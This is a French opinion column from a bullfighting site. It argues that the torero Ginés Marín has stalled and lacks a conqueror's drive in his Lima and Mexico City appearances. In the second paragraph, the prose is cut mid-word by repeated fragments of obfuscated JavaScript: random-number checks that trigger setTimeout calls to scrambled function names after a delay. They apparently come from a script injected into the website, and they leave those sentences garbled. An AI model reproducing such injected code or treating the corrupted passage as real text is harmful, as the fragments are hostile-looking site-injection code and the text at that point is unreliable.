À PROPOS DE GINÉS MARÍN

Il y a des toreros qui ne perçoivent pas à quelle vitesse évolue la tauromachie, ainsi, sans s’y attendre, ils sont dans le passé, alors que ceux qui arrivent les dépassent à une vitesse vertigineuse. Ce qui arrive à ceux dont on annonce et annonce une belle projection mais qui n’explosent pas. Ils ont toutes les conditions pour le faire mais pour différentes raisons ils ne s’élèvent pas au point de conjuguer ensemble la réalité et l’espérance ; autrement dit, ce qu’ils font devant le toro et ce que l’on attend d’eux.

Normalement, les attentes ont un fondement. Lors de leurs prestations qui les précèdent, ils ont été capables de générer une série d’expectatives qui au bout d’un moment semblent stagner, ne pas aller au-delà. Et les après-midis se succèdent sans que ces prévisions se consolident, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and l’on sait que le toreo, comme la vie, se fait pas à pas, passe après passe, corrida après corrida, toro après toro, et surtout lors de rendez-vous particuliers où le torero centre l’attention de l’aficionado, qui attend des résultats de ces confrontations car il lui semble que ce sont des paliers indispensables pour franchir les échelons de celui qui aspire de continuer de grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andir.

Il y a des centaines d’exemples, mais aujourd’hui je vais me limiter à parler implicitement de Ginés Marín, un torero avec d’excellentes qualités pour devenir –comme je l’ai dit à maintes occasions- un torero d’exception, pour le niveau de sa tauromachie, sa classe mais aussi son courage, mais il semblerait parfois que son ambition se diffuse au point de tenir un rôle secondaire qui ne favorise en rien ses aspirations.

Je suis son parcours depuis bien avant son sidérant début en piquée à Olivenza, et comme il est normal, je m’intéresse de près à sa saison américaine. Il est vrai que mes seules sources d’information en Amérique sont les chroniques et les vidéos auxquelles j’ai pu avoir accès lors de chacune de ses prestations et soit ceux qui écrivent sur lui surévaluent ce qu’il a fait ou les vidéos ne choisissent que certaines séquences et cachent le meilleur de ses faenas. En tous les cas, une chose est claire : ni les résultats de Lima ni ceux des arènes de Mexico ne vont dans le sens que nous souhaiterions tous. Et je ne réfère pas au fait de couper des oreilles ou de sortir en triomphe, je le dis car à Acho devant une corrida à la présentation très limitée –dommage qu’on détruise ce que l’on a mis si longtemps à bâtir- mais compliquée du fer de Camponuevo, et à la Monumental de Insurgentes, face à une corrida mansa mais bien présentée de José Julián Llaguno, je ne l’ai vu faire ce pas en avant que l’on attend et l’on exige de celui qui veut être figura de la tauromachie. À Lima il manquait de confiance en lui et à la Mexico je l’ai trouvé académique, facile, propre, mais sans fouler les terrains et sans la volonté du conquérant ; sans ce visage « affamé » que j’avais vu chez lui étant novillero à Arnedo et dans bien d’autres lieux.  Marín se retrouve dans cette impasse du « oui, mais… », ambiguë et restrictive, où partent en fumée tous les espoirs du torero et de ses partisans, s’il persiste dans ce sens.

Je sais que les toros ne l’ont pas aidé, mais il y a des fois où les toreros ont besoin qu’on leur tire les oreilles pour qu’ils voient la réalité même si cela leur déplaît. J’espère que cet article y contribuera et que Cutiño –qui paraît-il il consulte notre site- fasse parvenir au torero ces réflexions qui, je n’en doute pas, l’intéresseront et qu’il pourra contrecarrer, je le souhaite, vêtu de lumières.

Les commentaires sont fermés.